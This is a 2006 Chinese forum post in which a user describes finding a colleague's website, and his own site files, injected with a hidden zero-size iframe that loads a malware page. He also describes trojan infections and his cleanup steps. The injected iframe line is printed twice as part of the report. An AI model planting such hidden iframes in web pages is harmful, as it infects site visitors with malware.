今天帮同事测试了下网站,中了88kv病毒

agaovxy 2006-04-24 02:29:46
今天同事叫我测试一下网站,偶就浏览了一下,靠,奇怪,我看到状态栏在连接
http://www.88kv.cn/mm/index.htm,我的地址不是这个,怎么连这个网站了,看着那mm两字,偶就知道有问题了,过了一会,偶的卡巴不断跳出窗口说有病毒了,郁闷,马上怀疑这个网站中毒了,然后看了看网站,发现网站所有html文件和asp文件都被嵌入了
<ifRame src="http://www.88kv.cn/mm/index.htm" width="0" height="0" frameborder="0"></ifrAme>
同时偶硬盘上的成千上万网站程序都被嵌入了,靠,马上把浏览器关掉,拿起卡巴扫了几下,看样子杀干净了,重新启动一下,一个木马文件也随机启动了,郁闷,马上输入msconfig 把启动的东西全部去掉,再拿起卡吧扫了几下,没什么反映了,不甘心,把偶的必杀软件木马杀客启动再扫了几下,不得了,又杀了几个,传说中的qq木马大盗和灰鸽子出现了,这家伙没良心啊,偶泡mm的qq都想要,郁闷,然后偶就把网线断掉,下了这个软件 http://www.alertbookmarks.com/wildcard/
这个可牛啊,偶把整个硬盘的所有网站程序的页面包含有<ifRame src="http://www.88kv.cn/mm/index.htm" width="0" height="0" frameborder="0"></ifrAme> 全部替换为空,不到10分种,偶成钱上万的网页恢复正常了,然后重新启动一下,打开天网放火墙,哦,有可疑的文件要往外连接,看了看,没见过,马上禁止,听说现在的木马越做越厉害啊,改什么特征码,加壳的,怕怕,杀毒软件都杀不死,杂们只好装个放火墙了,然后在cmd 下netstat -an 看了下,没什么可疑的连接,再到灰鸽子的官方网站下了个 木马辅助查找器,这年头自己作木马,反而搞了个查木马的,呵呵,不管3721,把所有的程序都关闭先,再次看清楚,看到垃圾就删除,以上一切在安全模式操作,杀毒肯定在安全模式嘛!同时,骂了同事一下,浪费偶泡mm的时间。
...全文
89 3 点赞 打赏 收藏 举报
写回复
3 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
soft_2008 2006-04-24
- -
  • 打赏
  • 举报
回复
ashchen 2006-04-24
灰鸽子很厉害的,基本18般武艺都用上了
  • 打赏
  • 举报
回复
jspadmin 2006-04-24
。。。。。。
  • 打赏
  • 举报
回复
相关推荐
发帖
非技术区
加入

2078

社区成员

Web 开发 非技术区
申请成为版主
帖子事件
创建了帖子
2006-04-24 02:29
社区公告
暂无公告